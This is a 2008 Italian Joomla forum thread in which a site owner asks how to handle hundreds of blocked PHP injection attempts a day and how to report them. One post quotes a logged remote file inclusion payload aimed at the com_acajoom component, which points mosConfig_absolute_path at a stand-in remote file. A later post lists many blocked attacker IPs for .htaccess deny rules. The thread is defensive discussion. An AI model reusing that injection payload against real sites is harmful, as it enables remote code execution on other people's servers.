Back to top

Autore Topic: Attacco a sito joomla  (Letto 3191 volte)

Offline angelcs

  • Appassionato
  • ***
  • Post: 689
  • Sesso: Maschio
  • SEO
    • Mostra profilo
Attacco a sito joomla
« il: 29 Apr 2008, 17:18:25 »
Ragazzi vorrei sottoporre alla vostra attenzione questo genere di attacco al mio sito.

Siccome ho installato quel componente che ti avvisa se ce stato un tentativo di php iniection, flood, etc..
Ma ultimamente ricevo moltissime email di attacchi bloccati ma saranno centinaia al giorno, credete che possa provocare danni al sito, o meglio come potrei fare per denunciare l'accaduto alla polizia postale?

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #1 il: 29 Apr 2008, 17:26:36 »
Sono tentativi o hai avuto qualche intrusione?
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline angelcs

  • Appassionato
  • ***
  • Post: 689
  • Sesso: Maschio
  • SEO
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #2 il: 01 Mag 2008, 01:38:35 »
solo tentativi come questo, ma dato che ne ricevo tanti incominciano a scocciare un po

Vorrei consigli per rintracciarli, ho una lunga lista di IP Whois.

Codice: [Seleziona]
TYPE:     PHP injection
 IP:       79.170.88.222
 USER:     [0]
 REFERER:
 GET:      Array
(
   [option] => com_acajoom
   [task] =>
   [Itemid] =>
   [mosConfig_absolute_path] => <b>http://dominio.com/nomefile.txt??</b>
)

 POST:     Array
(
   [mosConfig_absolute_path] => <b>http://dominio.com/nomefile.txt??</b>
)

 COOCKIE:  Array
(
)

Tra l'altro non uso nemmeno questo componente  ;)

Offline frak68

  • Esploratore
  • **
  • Post: 121
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #3 il: 01 Mag 2008, 12:49:27 »
come si chiama il componente?
grazie

Offline Daniele Pinna

  • Appassionato
  • ***
  • Post: 595
  • Sesso: Maschio
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #4 il: 01 Mag 2008, 20:53:10 »
Il componente è per caso qualcosa di simile a "sentinel" per PHP-NUKE?
Se si... io ho ancora un sito in PHP-NUKE (in realtà è le vecchia versione di un sito che ho convertito in Joomla ma del quale ho lasciato ancora la versione NUKE accessibile) e in effetti anche a me arrivano diverse decine di email di segnalazione al giorno...

Sentinel fa il suo lavoro... ma spesso sbaglia!
Ad esempio, da un cliente non riuscivo ad accedere al mio vecchio sito e compariva una schermata nera e mi diceva che l'ip dal quale mi connettevo era in una black list...
(non ho avuto tempo per "indagare meglio su quel problema, perché proprio in quel periodo stavo scoprendo Joomla!  ;D )

Offline angelcs

  • Appassionato
  • ***
  • Post: 689
  • Sesso: Maschio
  • SEO
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #5 il: 04 Mag 2008, 01:10:09 »
Si, il compoente a pagamento e non posso elencarlo comunque assomiglia a sentinel e sbaglia anche lui, purtroppo non ce ne sono altri per joomla, almeno credo?

Avete qualche consiglio su come rintracciare gli spammer apparte IP, lookup, dns..

Oppure qualche programma adatto alla sicurezza apparte i firewall

Consigli?

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #6 il: 04 Mag 2008, 14:54:36 »
Si, il compoente a pagamento e non posso elencarlo comunque assomiglia a sentinel e sbaglia anche lui, purtroppo non ce ne sono altri per joomla, almeno credo?

Avete qualche consiglio su come rintracciare gli spammer apparte IP, lookup, dns..

Oppure qualche programma adatto alla sicurezza apparte i firewall

Consigli?
non è semplice risalire dall' ip, perchè il più delle volte gli ip sono di ingnari utenti.
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline ..-. ..-

  • Appassionato
  • ***
  • Post: 408
  • Joomla! Per semplice sito .... No Grazie!
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #7 il: 04 Mag 2008, 15:00:23 »
Il nome della componente che probabilmente è sotto attacco, (anche senza citarne il nome) è li in bella mostra nel codice citato nel terzo post di questo topic... 7ma riga [option].... e non aggiungo altro :)
“Non potrei vivere se non avessi la sensazione che oggi so qualcosa più di ieri.”
(M. McCarthy)

Offline angelcs

  • Appassionato
  • ***
  • Post: 689
  • Sesso: Maschio
  • SEO
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #8 il: 07 Mag 2008, 00:41:21 »
Si, saranno anche di ignari utenti ma stare fermi ad apettare non mi sembra la cosa migliore.

Rispondo a vamba che gli e sfuggito che quel componente non lo uso.

Ma se facciamo una guida su come gestire gli attacchi a Joomla sarebbe così male?

- Tipo i dati che conviene avere per poter poi denunciare alla polizia postale.
- Quali documenti servono
- Quali facsimile scaricare e compilare.
etc.. etc..

Offline angelcs

  • Appassionato
  • ***
  • Post: 689
  • Sesso: Maschio
  • SEO
    • Mostra profilo
Re: Attacco a sito joomla
« Risposta #9 il: 31 Mag 2008, 02:16:37 »
allora vi elenco la lista IP bloccati fino ad ora che credo si allungherà ancora un po.

Magari vi può servire, sono tutti indirizzi di siti bucati stranieri.

Chi volesse bloccarli come ho fatto io, lo può fare in vari modi. (Script, pannelli di controllo, firewoll, o semplicemente dal file .htaccess)  inserendo deny from numero IP


Lista IP
Codice: [Seleziona]
121.136.154.170
123.121.209.1
130.225.189.206
137.204.107.138
147.202.44.247
148.202.29.8
193.0.253.140
193.138.157.10
193.138.217.3
193.145.28.20
193.164.131.35
193.221.122.60
193.242.108.55
195.110.147.194
195.12.48.155
195.12.53.176
195.155.232.37
195.74.37.170
195.74.37.180
200.105.239.8
200.37.173.162
201.130.79.61
202.143.173.2
202.51.232.116
203.162.2.136
203.22.204.167
203.237.226.64
203.86.232.83
203.88.114.169
204.92.87.157
205.234.141.149
206.104.21.198
206.117.237.200
206.248.108.218
206.53.51.242
207.112.101.206
207.178.0.196
207.178.0.196
207.44.147.74
207.57.70.193
207.58.179.218
208.74.9.26
209.12.244.192
209.160.72.145
209.168.161.227
209.205.39.23
209.216.203.6
209.67.63.2
209.8.234.8
209.90.77.57
210.127.253.161
210.245.197.252
211.233.12.225
212.100.249.158
212.114.10.247
212.71.28.84
213.140.11.143
213.161.204.67
213.186.117.208
213.193.222.176
213.194.149.65
213.195.72.156
213.198.106.106
213.215.223.191
213.215.80.102
213.246.51.45
213.246.61.4
213.92.118.223
216.102.9.150
216.118.97.160
216.167.156.20
216.17.101.27
216.17.107.171
216.193.201.57
216.227.208.240
216.227.209.17
216.239.0.245
216.27.59.13
216.29.207.126
216.32.85.218
216.86.36.58
217.13.199.32
217.147.211.198
217.148.95.133
217.160.74.116
217.172.161.101
217.196.64.12
217.197.68.66
217.73.161.62
218.50.53.151
219.94.130.26
221.116.201.42
221.6.101.22
222.113.111.244
38.99.13.123
59.22.140.17
59.63.157.83
60.190.240.73
61.63.9.163
62.146.87.70
62.149.229.16
62.193.237.22
62.2.100.138
62.240.12.1
62.75.184.73
62.76.116.20
64.1.215.162
64.123.108.73
64.182.4.97
64.20.46.121
64.202.126.179
64.242.234.146
64.27.19.194
64.34.200.250
64.34.98.189
65.126.237.102
65.254.39.118
65.54.165.43
65.55.213.54
65.55.213.55
65.98.29.18
66.103.128.44
66.103.131.81
66.109.18.92
66.151.162.98
66.219.101.32
66.225.216.227
66.235.180.32
66.249.67.129
66.249.72.115
66.249.72.97
66.29.10.40
66.40.12.40
66.7.203.150
67.15.205.17
67.15.58.22
67.19.250.26
67.205.74.75
67.205.85.232
67.212.173.42
67.228.115.242
67.228.55.26
67.59.151.227
67.70.55.92
69.10.155.122
69.20.5.26
69.72.208.186
69.72.218.2
69.73.146.54
69.9.129.6
69.94.120.198
69.94.72.29
69.95.221.212
70.71.134.80
70.84.138.2
70.91.145.249
72.249.96.204
72.29.70.163
72.29.95.45
72.36.146.2
72.36.154.122
72.47.201.117
72.52.130.240
72.55.137.199
72.55.165.133
72.55.168.243
72.9.248.162
74.12.63.26
74.15.196.122
74.208.111.178
74.210.176.55
74.52.238.34
74.53.240.146
74.53.83.146
74.53.84.2
74.53.85.34
74.55.6.34
75.125.11.114
75.126.158.11
75.137.154.212
76.76.9.135
77.48.10.14
78.129.208.60
79.189.166.26
79.8.86.118
80.153.20.230
80.154.38.121
80.222.126.208
80.237.160.86
80.67.23.140
80.74.155.173
80.86.84.237
80.86.84.41
80.93.216.146
81.176.77.163
81.177.4.33
81.215.142.136
82.103.135.7
82.104.53.93
82.194.70.137
82.194.71.196
82.194.71.79
82.194.74.138
82.194.82.114
83.103.23.40
83.149.104.1
83.246.118.249
84.19.178.201
84.244.158.97
84.40.17.23
85.114.133.81
85.14.22.50
85.17.148.58
85.17.237.197
85.18.136.89
85.180.26.216
85.214.109.12
85.214.121.92
85.214.48.33
85.214.50.193
85.214.72.189
85.214.87.108
85.234.132.103
85.234.133.173
85.25.8.84
86.104.26.115
86.109.167.35
86.58.154.237
87.106.185.12
87.15.107.13
87.16.20.179
87.175.222.141
87.230.7.194
87.230.86.137
87.245.149.155
87.253.162.6
87.4.81.160
88.166.35.71
88.198.38.178
88.213.131.200
88.255.107.178
88.84.128.164
88.84.132.4
88.84.157.101
89.108.66.127
89.108.67.176
89.108.93.123
89.111.173.117
89.122.213.128
89.122.29.40
89.149.235.23
89.149.241.229
89.218.85.18
89.248.101.69
89.253.246.201
89.36.243.4
89.42.133.2
91.121.115.49
91.151.23.4
91.151.85.156
91.186.11.35
91.42.82.57
92.114.187.28
92.48.64.170
92.48.75.104
93.93.112.23
99.238.107.156

 



Web Design Bolzano Kreatif